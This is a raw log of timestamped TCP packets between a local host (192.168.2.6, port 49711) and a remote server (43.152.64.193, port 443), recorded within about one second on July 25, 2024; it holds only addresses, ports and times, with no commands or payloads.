Jul 25, 2024 11:25:37.041043043 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.041130066 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.041141033 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.041179895 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.041696072 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.041773081 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.041780949 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.041810989 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.044760942 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.044852972 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.044862032 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.044894934 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.136111021 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.136212111 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.136322021 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.136362076 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.136706114 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.136775970 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.136787891 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.136821985 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.137217045 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.137253046 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.137274981 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.137288094 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.137305975 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.137321949 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.140347958 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.140430927 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.140438080 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.140471935 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.140852928 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.140887022 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.140912056 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.140918970 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.140942097 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.140957117 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.223695040 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.223728895 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.223844051 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.223886967 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.223901033 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.223921061 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.223941088 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.223988056 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.223994970 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.224025011 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.224034071 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.224092960 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.224098921 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.224131107 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.231975079 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.232043028 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.232053041 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.232084036 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.232530117 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.232589960 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.232595921 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.232631922 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.232986927 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.233043909 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.233050108 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.233079910 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.233582020 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.233640909 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.233647108 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.234061956 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.234086990 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.234092951 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.234117031 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.234138966 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.234426022 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.234477997 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.234483957 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.234513044 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.235181093 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.235245943 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.235250950 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.235281944 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.236103058 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.236124039 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.236161947 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.236169100 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.236187935 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.236203909 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.315022945 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.315052986 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.315216064 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.315232992 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.315274954 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.315571070 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.315593004 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.315629005 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.315634966 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.315661907 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.315675020 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.317487001 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.317528963 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.317550898 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.317558050 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.317579985 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.317600012 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.317605019 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.317634106 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.318686962 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.318751097 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.318773031 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.318779945 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.318798065 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.318799019 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.318814993 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.318823099 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.318841934 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.318864107 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.318867922 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.318897009 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.321062088 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.321130991 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.321139097 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.321168900 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.321546078 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.321604967 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.321613073 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.321619034 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.321652889 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.322256088 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.322283030 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.322318077 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.322324038 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.322341919 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.322357893 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.326337099 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.326365948 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.326406956 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.326416016 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.326435089 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.326450109 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.406843901 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.406898975 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.406985044 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.406996965 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.407027006 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.407043934 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.416373968 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.416403055 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.416445017 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.416451931 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.416493893 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.420908928 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.421026945 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.421034098 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.421066046 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.426004887 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.426090956 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.426098108 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.426126957 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.430031061 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.430094957 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.430294991 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.430331945 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.433142900 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.433243990 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.433250904 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.433281898 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.437882900 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.437967062 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.437973976 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.438003063 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.442962885 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.443048000 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.443054914 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.443089962 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.450424910 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.450455904 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.450504065 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.450510979 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.450547934 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.459404945 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.459436893 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.459491968 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.459497929 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.459531069 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.468125105 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.468154907 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.468195915 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.468200922 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.468221903 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.468242884 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.499315023 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.499367952 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.499397039 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.499402046 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.499440908 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.499445915 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.499455929 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.499491930 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.499499083 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.499527931 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.513712883 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.513736963 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.513783932 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.513789892 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.513824940 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.516758919 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.516822100 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.516828060 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.516858101 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.521085978 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.521151066 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.521157026 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.521184921 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.530359030 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.530383110 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.530441046 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.530447960 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.530479908 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.534296036 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.534362078 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.534368038 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.534399033 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.538834095 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.538899899 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.538904905 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.538938046 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.542933941 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.543004990 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.543013096 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.543045044 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.553478003 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.553505898 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.553587914 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.553601980 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.553637028 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.560887098 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.560904980 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.560961008 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.560970068 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.561001062 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.593106031 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.593125105 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.593190908 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.593199968 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.593233109 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.655530930 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.655580997 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.655610085 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.655620098 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.655653954 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.655674934 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.662002087 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.662019968 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.662096024 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.662103891 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.662136078 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.671020985 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.671037912 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.671113014 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.671120882 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.671152115 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.674815893 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.674889088 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.674895048 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.674923897 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.683624983 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.683645964 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.683697939 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.683708906 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.683743000 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.686891079 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.686952114 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.686958075 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.686990023 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.691313982 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.691376925 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.691385984 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.691415071 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.695945024 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.696007013 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.696013927 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.696044922 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.704705954 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.704730988 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.704780102 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.704791069 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.704823971 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.704823971 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.717454910 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.717473030 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.717526913 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.717539072 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.717613935 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.756095886 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.756129026 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.756731033 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.756742954 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.757014990 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.757039070 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.757072926 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.757102966 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.757112026 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.757155895 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.757155895 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.763516903 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.763536930 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.763928890 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.763936996 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.763978004 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.771912098 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.771931887 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.772000074 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.772000074 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.772008896 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.772041082 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.773142099 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.773209095 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.773221016 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.773274899 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.782998085 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.783019066 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.783292055 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.783299923 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.783670902 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.787116051 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.787194014 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.787208080 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.787348032 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.791230917 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.791311026 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.791321993 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.791507006 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.798027992 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.798110962 CEST	49711	443	192.168.2.6	43.152.64.193
Jul 25, 2024 11:25:37.798121929 CEST	443	49711	43.152.64.193	192.168.2.6
Jul 25, 2024 11:25:37.798269033 CEST	49711	443	192.168.2.6	43.152.64.193
